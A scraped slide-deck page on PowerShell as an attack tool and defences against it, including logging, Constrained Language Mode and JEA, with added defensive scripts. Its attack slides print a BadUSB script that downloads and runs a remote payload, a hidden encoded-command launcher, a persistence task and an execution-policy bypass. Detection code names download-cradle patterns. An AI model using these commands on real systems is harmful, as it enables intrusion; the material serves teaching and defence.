PowerShell is now a ‘mandatory-to-use’ tool for IT professionals who automate administration of the Windows OS and applications, including Azure and Nano Server. Unfortunately, threat actors have recently taken advantage of this powerful scripting language precisely because PowerShell is already installed on your Windows machines and trusted by admins and most antivirus tools! The session presents the steps that should get you started with (ethical) hacking and pen testing with PowerShell, and some new techniques, such as JEA (Just Enough Administration), that a defender can use to limit the effectiveness of PowerShell attacks.
PowerShell, the must-have tool for administrators, and the long overlooked security challenge. See Kieran Jacobsen present how PowerShell, with its deep Microsoft platform integration, can be utilised by an attacker to become a powerful attack tool. Learn how an attacker can move from a compromised workstation to a domain controller using PowerShell and WinRM whilst learning how to defend against these attacks.
Pre-auth SYSTEM RCE on Windows Is more common than you think
----
With minimal to no effort, we can gain SYSTEM level access to hundreds, if not thousands, of machines on the internet [remotely]. No, this is not a new super 1337 exploit, and no, this is not even a new technique. No super fancy website with a poorly designed logo is necessary; there is nothing new here. Tim and Dennis have discovered that something only stupid sysadmins would do turns out to be much more prevalent than expected. What starts off as a sysadmin's innocent attempt to fix an issue turns into complete compromise of entire servers/workstations with no effort needed from the attacker. Tim and Dennis will discuss how we came to this realization and explain how we automated looking for these issues in order to find hundreds of vulnerable machines over the internet. Tim and Dennis explain the tool developed for automation, provide statistics discovered from our research, and go over ways to protect yourself from falling victim to the issue.
Lateral Movement: How attackers quietly traverse your Network (EC-Council)
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
All You Need is One - A ClickOnce Love Story - Secure360 2015 (NetSPI)
ClickOnce is a deployment solution that enables fast, easy delivery of packaged software. It is commonly used by organizations to deploy both internal and production-grade software packages, along with their respective updates. By allowing end-users to accept the requested permissions of the software package without the intervention of an administrator, ClickOnce simplifies the deployment and use of robust software solutions.
It also provides an excellent opportunity for malicious actors to establish a foothold in your network.
In this presentation, we discuss how we combined ClickOnce technology and existing phishing techniques into a new methodology for establishing an initial presence in an environment. By minimizing user interaction, we only require that the user is fooled for “one click” – after that, we already have a foothold in their environment and are ready to pivot and escalate further.
SANS @Night Talk: SQL Injection Exploited (Micah Hoffman)
This presentation was given at the SANS Rocky Mountain Conference in Denver, CO, June 2014. The presentation had a rather large portion that was demo. That is not captured here. Sorry.
Incorporating PowerShell into your Arsenal with PS>Attack (jaredhaight)
This talk serves as a follow up to my Introducing PS>Attack talk and covers some new features that have been added to the tool as well as how to defend an environment against PowerShell based attacks.
Application and Website Security -- Fundamental Edition (Daniel Owens)
This is the first presentation in the 200 level, specifically targeting developers with a more hardcore training program. This program includes numerous case studies and live demonstrations and is considered technical, but does not require a working knowledge of the languages discussed.
This deck covers different techniques that leverage PowerShell to attack Windows systems in a variety of ways. It is an interesting agglomeration of combined methods for plundering a Windows box.
Hacker Halted 2014 - Post-Exploitation After Having Remote Access (EC-Council)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where you have deployed malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Top 10 ways to make hackers excited: All about the shortcuts not worth taking (Paula Januszkiewicz)
Designing secure architecture can always be more expensive, time consuming, and complicated. But does it make sense to cut corners when hackers invent new attacks every day? Taking shortcuts will sooner or later translate to more harm and backfire. Come to the session and learn what mistakes we eliminated when working with our customers.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs (Shakacon)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where the hacker/penetration-tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g., communicating with a bind-shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
CyberOm - Hacking the Wellness Code in a Chaotic Cyber World (EC-Council)
Learn how to find peace and happiness within you and around you amidst chaos, and understand how the mind-body-energy connection plays a crucial role in the world of Cyber. Mental health and wellness can be the difference between a Cyber professional and a criminal.
Cloud Security Architecture - a different approach (EC-Council)
Whether people admit it or not, everyone is moving to the cloud, and all future business will run somewhere on the internet. Moving to the cloud requires a different set of architecture and a different mindset. Data is stored, accessed and processed on different platforms and devices. Employees are working from anywhere in the world, and corporate data is no longer under company IT custody. CISOs and CIOs need to think differently and set a new Cloud Security Architecture. This session will try to draw the main areas of concern from a security perspective while moving to the cloud.
This webinar is primarily intended for those that are in need of an informational overview on how to respond to information security incidents or have a responsibility for doing so. It will also assist with your preparation for a Computer Security Incident Handling certification.
Hacking Your Career – Hacker Halted 2019 – Keith Turpin (EC-Council)
HACKING YOUR CAREER
Learn how to take charge of your future and wring success out of every opportunity. I had some hard lessons on my way to becoming the CISO of a billion dollar company and now you can benefit from those experiences. In this candid conversation, you will learn the secrets to kicking your career’s ass.
HACKING DIVERSITY
We talk a lot about why diversity is important and we are all familiar with the woeful inclusion stats. In this talk we will discuss why diversity is important from both the perspective of an organization’s bottom line and the individual contributor.
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver (EC-Council)
CLOUD PROXY TECHNOLOGY [THE CHANGING LANDSCAPE OF THE NETWORK PROXY]
This class will cover the distinctions between traditional proxy technology and the emergence in recent years of cloud proxy, and why it matters to organizations today. We will review real use cases and their corresponding screenshots to provide a stimulating session.
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack... (EC-Council)
DNS: STRATEGIES FOR REDUCING DATA LEAKAGE & PROTECTING ONLINE PRIVACY
DNS is the foundational protocol used to direct nearly all Internet traffic, making the collection and analysis of DNS traffic highly valuable. This talk will examine ways in which you can effectively limit the disclosure of your online habits by securing the way your local DNS resolvers work.
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico (EC-Council)
THE $750 BILLION VEHICLE DATA GOLD RUSH – PIRATES AHOY!
Vehicle data may be worth $750b by 2030. Problem: vehicle security, privacy, and user awareness of risks are inadequate. Andrea Amico will share some exploits including his “CarsBlues” which exposes people’s personal data, affects 22 makes, and is still a 0-Day for tens of millions of vehicles.
BREAKING SMART [BANK] STATEMENTS
Explanation of how I find and exploit a security flaw (bad implementation of cryptography) in a bank statement, sent via email, of one of the biggest banks in Mexico.
Are your cloud servers under attack? – Hacker Halted 2019 – Brian Hileman (EC-Council)
ARE YOUR CLOUD SERVERS UNDER ATTACK
For this presentation, I built out a test lab in AWS and allowed someone to hack the servers. I will talk about what we saw when we opened RDP to the internet, what the hackers did once they got in, and someone trying to kick me off my own servers.
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ... (EC-Council)
Behold the powers of behavioral alchemy! Are you ready to unleash 4 "Trojan Horses for the Mind" that will change the way you communicate forever? How about a magic wand that will help manifest secure behaviors and shape culture? Attend this session and harness the power.
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall... (EC-Council)
Present your risk assessments to your board of directors in the language they understand - financial loss. "FAIR" or "Factor Analysis of Information Risk" is the quantitative risk analysis methodology that works with common frameworks while adding context for truly effective risk management.
Alexa is a snitch! Hacker Halted 2019 - Wes Widner (EC-Council)
ALEXA IS A SNITCH!
You’re not paranoid, your voice assistant is listening. And what’s worse, Alexa is snitching on you! What is she hearing? Where is she sending it? And is there anything we can do to stop her?!
Join me as we discuss the current state of security around voice assistants. And how to silence them.
2. George Dobrea
xEduco
gdobrea@xeduco.net | @gdobrea
Microsoft Certified Trainer (since 1998)
MVP – Enterprise Security (since 2005)
EC-Council Instructor of the Year (2016)
3. My Last trips:
Bucharest (home)
Tokyo
Phnom Penh / Cambodia
Washington DC
New Delhi
Dubai
London
Brussels
Vilnius, Tallinn, Riga
Finland
Peru
Germany
Toronto
Cape Town
Teaching / Consulting / Speaking / Volunteering
Or Just Travelling for Fun…
4. My First Public Speech about PowerShell Vulnerabilities in a MS conference…
5. > Get-content
PowerShell as an attack platform
PowerShell malware
Pen Testing tools based on PowerShell
PowerShell security, and bypassing that security
Defence strategies
PowerShell v5 new security features
6. PowerShell
Shell and scripting language present by default on all Windows machines.
… Now open sourced and available on Linux
Designed to automate things and make life easier for system admins.
Based on the .Net framework and tightly integrated with Windows.
Access to the Win32 and Native API
Easy to learn and to write scripts !
8. Current Landscape of PowerShell Threats
38 % of security incidents reported utilized PowerShell in some form or another
68 % of system breaches had some PowerShell involvement.
31 % of all reported incidents involving PowerShell drummed up no security alerts before the threat was discovered.
Carbon Black - United Threat Research Report 2016
“If PowerShell is a hammer, everything is a nail”
10. … Why Not?
PowerShell is an ideal platform for attackers
Installed by DEFAULT on Windows Systems
Provides access to almost everything in a Windows platform which could be useful for an attacker
o Registry, file system, active directory, networking, services, processes, WMI, COM, Hyper-V
Run code in memory without touching disk
WinRM is enabled by DEFAULT on Windows Server
Trusted by countermeasures (AntiVirus) and SysAdmins
A wealth of attack / pen testing tools already exist:
o Shellcode injectors, DLL injectors, keyloggers, port-scanners, reverse/bind shells, botnets, hash dumping utilities
11. PowerShell attack code can be invoked by:
Microsoft Office Macro (VBA)
WMI
HTA Script (HTML Application – control panel extensions)
CHM (compiled HTML help)
Java JAR file
Other script type (VBS/WSH/BAT/CMD)
Typically an Encoded Command
Encoded commands obfuscate attack code and can even be compressed to avoid the Windows console character limitation (8191)
Powershell.exe -WindowStyle Hidden -noprofile -EncodedCommand <BASE64ENCODED>
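As an added example (not from the slides), the following PowerShell decodes an -EncodedCommand launch line like the one above and scores it against the indicators this deck names; the sample command line and its payload are constructed here, and the function names are my own.

```powershell
function ConvertFrom-EncodedCommandLine {
    # Pull the Base64 argument of -EncodedCommand (or any unambiguous prefix such
    # as -e, -ec, -enc) out of a process command line and decode it. PowerShell
    # encodes the script as UTF-16LE before Base64, so decode with Unicode.
    param([Parameter(Mandatory)][string]$CommandLine)

    # Heuristic: a dash or slash, 'e', optional letters, then a long Base64 run.
    $m = [regex]::Match($CommandLine, '(?i)[-/]e[a-z]*\s+([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }
    try {
        $bytes = [Convert]::FromBase64String($m.Groups[1].Value)
    } catch {
        return $null   # a long token that is not valid Base64, e.g. a path
    }
    return [Text.Encoding]::Unicode.GetString($bytes)
}

function Test-SuspiciousPowerShellLaunch {
    # Score a launch line (Sysmon event 1 / Security 4688 CommandLine field)
    # against the tell-tale switches and cradle strings shown in this deck.
    param([Parameter(Mandatory)][string]$CommandLine)

    $decoded = ConvertFrom-EncodedCommandLine -CommandLine $CommandLine
    # Match against the visible line plus the decoded payload, if any.
    $text = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }

    $indicators = [ordered]@{
        'EncodedCommand'   = [bool]$decoded
        'HiddenWindow'     = $text -match '(?i)-w(indowstyle)?\s+hidden'
        'NoProfile'        = $text -match '(?i)-nop(rofile)?\b'
        'NonInteractive'   = $text -match '(?i)-noni(nteractive)?\b'
        'ExecPolicyBypass' = $text -match '(?i)-e(xecutionpolicy|p)\s+(bypass|unrestricted)'
        'DownloadCradle'   = $text -match '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)'
        'InvokeExpression' = $text -match '(?i)\b(iex|Invoke-Expression)\b'
    }
    $hits = @($indicators.GetEnumerator() | Where-Object { $_.Value } | ForEach-Object { $_.Key })
    [pscustomobject]@{
        Score      = $hits.Count
        Indicators = $hits -join ','
        Decoded    = $decoded
    }
}

# Constructed sample (not a real capture): a download cradle of the shape shown
# on the BadUSB slide, encoded exactly as an -EncodedCommand launcher encodes it.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$sample  = "powershell.exe -WindowStyle Hidden -noprofile -EncodedCommand $b64"

Test-SuspiciousPowerShellLaunch -CommandLine $sample | Format-List
```

Feed it the CommandLine field of Sysmon event 1 or Security 4688 (with command-line auditing enabled) to triage launches at scale; the constructed sample scores five indicators and returns the cradle as the decoded payload.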
12. Great, but how do I execute it on a victim machine ?
Code execution gained from an existing exploit
Via a website command injection vulnerability
Physical access – USB HID device
Stolen / captured credentials. With credentials, remote code execution can be gained with:
WMI
WSMAN
RDP, PowerShell Web Access ( yes, you can run PS from your smartphone ), etc…
19. Kali Linux – Social Engineering Toolkit (SET)
Kali Linux: More than 600 penetration testing tools included
- Some of them using PowerShell attack techniques
The SET has become a standard in the arsenal of the penetration tester
22. BadUSB RubberDucky Attack ( example #2)
Create a PowerShell Meterpreter reverse TCP payload and place it somewhere on your Kali Linux Web Server
This bypasses most AV, HIPS, IDS and Firewalls and leaves no evidence on the system
DELAY 750
GUI r
DELAY 750
STRING cmd
DELAY 200
ENTER
DELAY 200
STRING powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.132/powershell.ps1')
DELAY 200
ENTER
26. Basic methods (easy to implement, also to detect and remove)
Registry Settings
Scheduled tasks
Advanced Persistent Mechanism:
Permanent WMI
What if I want to persist my payloads?
PS> schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR "powershell.exe -Command Write-Host 'Doing evil stuff...'"
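As an added example (not from the slides), the audit below inventories the two persistence channels this slide names: scheduled tasks whose action launches PowerShell, and permanent WMI event subscriptions. It needs an elevated session on the host being checked; the function names are my own.

```powershell
function Get-PowerShellScheduledTask {
    # Every task with an action that runs powershell.exe/pwsh.exe, with its
    # arguments, since -EncodedCommand or -WindowStyle Hidden there is a strong
    # signal. The schtasks entry on the slide shows up as TaskName 'Updater'.
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if ($action.Execute -match '(?i)(powershell|pwsh)(\.exe)?$' -or
                $action.Arguments -match '(?i)powershell') {
                [pscustomobject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    Principal = $task.Principal.UserId
                    Execute   = $action.Execute
                    Arguments = $action.Arguments
                    Encoded   = [bool]($action.Arguments -match '(?i)-e[a-z]*\s+[A-Za-z0-9+/=]{16,}')
                }
            }
        }
    }
}

function Get-WmiPersistence {
    # Permanent WMI persistence needs three objects in root\subscription: an
    # __EventFilter (the trigger), an event consumer (what runs) and a
    # __FilterToConsumerBinding tying them together. On most hosts the list
    # is empty or holds only the built-in SCM event filter, so review each hit.
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)
    foreach ($b in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
        # Filter/Consumer are relative WMI paths such as __EventFilter.Name="x".
        $f = $filters   | Where-Object { $b.Filter   -match ('Name="{0}"$' -f [regex]::Escape($_.Name)) }
        $c = $consumers | Where-Object { $b.Consumer -match ('Name="{0}"$' -f [regex]::Escape($_.Name)) }
        [pscustomobject]@{
            FilterName    = $f.Name
            FilterQuery   = $f.Query            # WQL trigger, e.g. a timer or process start
            ConsumerClass = $c.__CLASS          # CommandLineEventConsumer, ActiveScriptEventConsumer, ...
            ConsumerName  = $c.Name
            # CommandLineTemplate is what executes for command-line consumers;
            # ScriptText for ActiveScript consumers.
            Payload       = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        }
    }
}

Get-PowerShellScheduledTask | Format-Table -AutoSize
Get-WmiPersistence | Format-List
```

Run both against a known-good baseline first, then diff: a new task or binding whose payload contains powershell with an encoded or hidden-window switch is the pattern this slide describes.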
27. Windows PowerShell Remoting and WinRM
PowerShell Remoting is based upon WinRM, Microsoft’s WS-Management implementation
Supports execution in 3 ways:
Remote enabled commands
Remotely executed script blocks
Remote sessions
Security Model = Trusted Devices + User Credentials
WinRM is required for the Windows Server Manager
WinRM is enabled by DEFAULT on Windows 2012(R2) Server
WinRM is allowed through Windows Firewall on all network profiles!
PowerShell/Win32-OpenSSH - work in progress !
28. PowerShell Remoting Kerberos Double Hop Solved Securely
$ServerB = Get-ADComputer -Identity ServerB
$ServerC = Get-ADComputer -Identity ServerC
Set-ADComputer -Identity $ServerC -PrincipalsAllowedToDelegateToAccount $ServerB
No PowerShell code modification.
No more SPNs for constrained delegation!
Credentials are not stored on ServerB.
Multiple domains and forests supported across trusts.
https://blogs.technet.microsoft.com/ashleymcglone/2016/08/30/powershell-remoting-kerberos-double-hop-solved-securely/
Resource-Based Kerberos Constrained Delegation is the solution !
29. PowerShell ‘Legacy’ Security Features
Administrative rights
UAC
Code Signing
Local or Remote source using zone.identifier alternate data stream
PowerShell Execution Policy
30. Bypassing Execution Policy ( Easy !!!)
The PowerShell Execution Policy is not a security boundary
Simply ask PowerShell: powershell.exe -executionpolicy unrestricted
Switch the file's zone.identifier back to local: unblock-file yourscript.ps1
Read the script in and then execute it (may fail depending on script)
Encode the script and use -encodedcommand – always works!!
Get/Steal a certificate, sign script, run script
C:\> powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file "c:\exploit.ps1"
31. Operational Security / Dealing with Forensics
Change WinRM settings / Block WinRM ?
Application whitelisting - AppLocker Policies
Enabling Constrained Language Mode
Log PowerShell Activity
Detecting attacks on mitigations (audit any changes to profile.ps1 or the registry keys that control module logging)
32. PowerShell is not powershell.exe
powershell.exe is just a host application
it hosts the assembly that contains PowerShell and handles I/O
System.Management.Automation.dll
Blocking PowerShell.exe does not stop PowerShell attacks!
33. PowerShell v5 ♥ the Blue Team !
Over-the-shoulder transcription
Deep script block logging
Antimalware Scan Interface Integration
Cryptographic Message Syntax (CMS) encryption and decryption cmdlets
Secure code generation APIs
Applocker + Constrained Language Mode
Protected Event Logging
Preventing unrestricted admin access (JEA)
34. PowerShell Logging
PS > Get-EventLog -LogName "Windows PowerShell" -InstanceId 800 | Where Message -match Add-Type | Select -First 10 | Format-List
Module Logging
Script Block Logging *
System-wide transcripts *
*Enabled by KB3000850 on Windows Server 2012 R2 / Windows 8.1 or WMF 5.0
Microsoft-Windows-PowerShell/Operational events:
4103 – Module logging
4104/4105/4106 – Script block logging
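As an added example (not from the slides), here is how to switch on the three logging channels listed above through the policy registry values that the Group Policy templates write (run elevated), followed by a hunt over the resulting 4104 script block events for the indicators this deck describes; the transcript path and the pattern list are my assumptions.

```powershell
function Enable-PowerShellLogging {
    # Assumption: any directory with an ACL that ordinary users cannot read.
    param([string]$TranscriptDirectory = 'C:\PSTranscripts')

    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    foreach ($sub in 'ScriptBlockLogging', 'ModuleLogging', 'ModuleLogging\ModuleNames', 'Transcription') {
        $null = New-Item -Path "$base\$sub" -Force
    }
    # 4104: full text of every script block as it is compiled, so obfuscated and
    # encoded code is logged in the form PowerShell actually executes.
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # 4103: pipeline execution details; '*' = '*' means every module.
    Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    $null = New-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force
    # Over-the-shoulder transcripts of every session, written to one directory.
    Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value $TranscriptDirectory
}

function Find-SuspiciousScriptBlock {
    # Scan recent 4104 events for strings tied to the techniques in this deck:
    # download cradles, Invoke-Expression, Base64 decoding, Add-Type / Win32 API
    # access used by in-memory injectors. Extend the pattern list to taste.
    param(
        [int]$MaxEvents = 500,
        [string[]]$Pattern = @('DownloadString', 'Net\.WebClient', 'Invoke-Expression', '\bIEX\b',
                               'FromBase64String', 'Add-Type', 'VirtualAlloc')
    )
    $rx = '(?i)(' + ($Pattern -join '|') + ')'
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 payload layout: [0] MessageNumber, [1] MessageTotal,
            # [2] ScriptBlockText, [3] ScriptBlockId, [4] Path (empty for in-memory code)
            $text = [string]$_.Properties[2].Value
            if ($text -match $rx) {
                [pscustomobject]@{
                    Time          = $_.TimeCreated
                    User          = $_.UserId
                    ScriptBlockId = $_.Properties[3].Value
                    Path          = $_.Properties[4].Value
                    Match         = $Matches[1]
                    Snippet       = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

Enable-PowerShellLogging
Find-SuspiciousScriptBlock | Format-Table -AutoSize
```

A hit with an empty Path is code that never touched disk, exactly the case the "run code in memory" slide warns about, and the ScriptBlockId lets you pull the remaining 4104 fragments of a long script.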
35. Limiting PowerShell Attack Capability with Constrained Language Mode
removing advanced feature support such as .Net & Windows API calls and COM access
The lack of this advanced functionality stops most PowerShell attack tools
Drawback: an environment variable must be set, either by running a command in PowerShell or via Group Policy
Pairing PowerShell v5 with AppLocker :
PowerShell v5 detects when AppLocker Allow mode is in effect and sets the PowerShell language to Constrained Mode for interactive input and user-authored scripts, severely limiting the attack surface on the system
[Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
36. Just In Time, Just Enough Administration (JitJea)
based on Windows PowerShell constrained runspaces
allowing specific users to perform administrative tasks on servers without giving them administrator rights
auditing all actions that these users performed
Before JEA
PS C:\> Copy-Item C:\SecureFiles\File.txt C:\Deployment\File.txt
PS C:\> Get-Content C:\Deployment\File.txt
Information I should not see
Using JEA
PS C:\> Copy-Item C:\SecureFiles\File.txt C:\Deployment\File.txt
PS C:\> Get-Content C:\Deployment\File.txt
This command is not available
37. PS> Enter-PSSession Server1
FAIL! – Talk to your supervisor for assistance
“George I need to be admin on Server1 to restart SQL”
“No Eddie. Just use JEA and connect to the ‘Maintenance’ EndPoint”
PS> Enter-JeaSession Server1 -Name Maintenance
Server1> Restart-Service MSSQLSERVER
Server1> Steal-Secrets
Error: You are not authorized to Steal-Secrets
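As an added example (not from the slides), this builds the ‘Maintenance’ endpoint of the dialogue above with the JEA that shipped in WMF 5: a role capability that exposes only Restart-Service for MSSQLSERVER, a session configuration mapping an AD group to that role under a virtual account, and registration on Server1. The module name, group name and paths are assumptions, and the connecting cmdlet in shipped JEA is Enter-PSSession -ConfigurationName rather than the Enter-JeaSession shown on the slide.

```powershell
# Run elevated on Server1. Role capabilities must live under a module's
# RoleCapabilities folder so that the session configuration can find them by name.
$ModuleName = 'SqlMaintenance'            # assumption
$Group      = 'CONTOSO\SqlMaintainers'    # assumption: the group Eddie belongs to
$modulePath = Join-Path $env:ProgramFiles "WindowsPowerShell\Modules\$ModuleName"
$rcPath     = Join-Path $modulePath 'RoleCapabilities'
$null = New-Item -ItemType Directory -Path $rcPath -Force
New-ModuleManifest -Path (Join-Path $modulePath "$ModuleName.psd1")

# Role capability = the allow-list. Restart-Service is exposed with its -Name
# parameter pinned to MSSQLSERVER; Get-Service lets Eddie confirm the result.
# Anything not listed (Get-Content on a secure file, the slide's Steal-Secrets)
# is simply not present in the session, so there is nothing to "bypass".
$visible = @(
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'MSSQLSERVER' } }
    'Get-Service'
)
New-PSRoleCapabilityFile -Path (Join-Path $rcPath 'SqlMaintenance.psrc') `
    -VisibleCmdlets $visible `
    -Description 'Restart the SQL Server service only'

# Session configuration = who gets which role. RunAsVirtualAccount means the
# commands execute as a transient local admin that exists only for the session,
# so Eddie is never granted admin rights and no admin credential is stored.
# Every session is transcribed for audit.
$pssc = Join-Path $env:ProgramData 'JEA\Maintenance.pssc'   # assumption
$null = New-Item -ItemType Directory -Path (Split-Path $pssc) -Force
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ $Group = @{ RoleCapabilities = 'SqlMaintenance' } }

# Validate before registering; registration restarts WinRM.
if (-not (Test-PSSessionConfigurationFile -Path $pssc)) { throw "Invalid session configuration: $pssc" }
$null = Register-PSSessionConfiguration -Name 'Maintenance' -Path $pssc -Force

# What Eddie runs from his workstation:
#   Enter-PSSession -ComputerName Server1 -ConfigurationName Maintenance
#   [Server1]: PS> Restart-Service MSSQLSERVER            # allowed
#   [Server1]: PS> Restart-Service Spooler                # rejected by ValidateSet
#   [Server1]: PS> Get-Content C:\SecureFiles\File.txt    # not recognized in this session
```

Get-PSSessionCapability -ConfigurationName Maintenance -Username $Group on Server1 shows exactly the command surface a member of that group receives, which is the check to run before handing the endpoint over.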
38. Time to set PowerShell policies in your organization…
Sample here:
Change ExecutionPolicy to only allow signed scripts to run.
Require all PowerShell scripts to be run from a specific location or path.
Discourage (or require exception for) the use of encoded parameters on the command line.
Discourage (or block) PowerShell scripts from downloading content from the Internet (or specify a “whitelist” of allowed IP addresses only).
Discourage (or block) the use of PowerShell to invoke commands on remote systems.
Require a custom parameter to be passed on all “legitimate” PowerShell usage.
Restrict PowerShell to specific users in your organization.
Require PowerShell to be launched from a specific process.
39. Useful Resources
PowerShell Gallery
• https://www.powershellgallery.com/
Hey, Scripting Guy! Blog
• http://blogs.technet.com/b/heyscriptingguy/
Just Enough Administration (JEA)
• https://msdn.microsoft.com/en-us/powershell/jea/using-jea
Practical Persistence with PowerShell
• http://www.exploit-monday.com/2013/04/PersistenceWithPowerShell.html
PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
• https://adsecurity.org/?p=2921
PowerShell Version 5 Security Enhancements
• https://adsecurity.org/?p=2277
Blogs of PowerShell gurus:
• Jeffrey Snover, Matt Graeber, Adam Driscoll, Sean Metcalf, Will Schroeder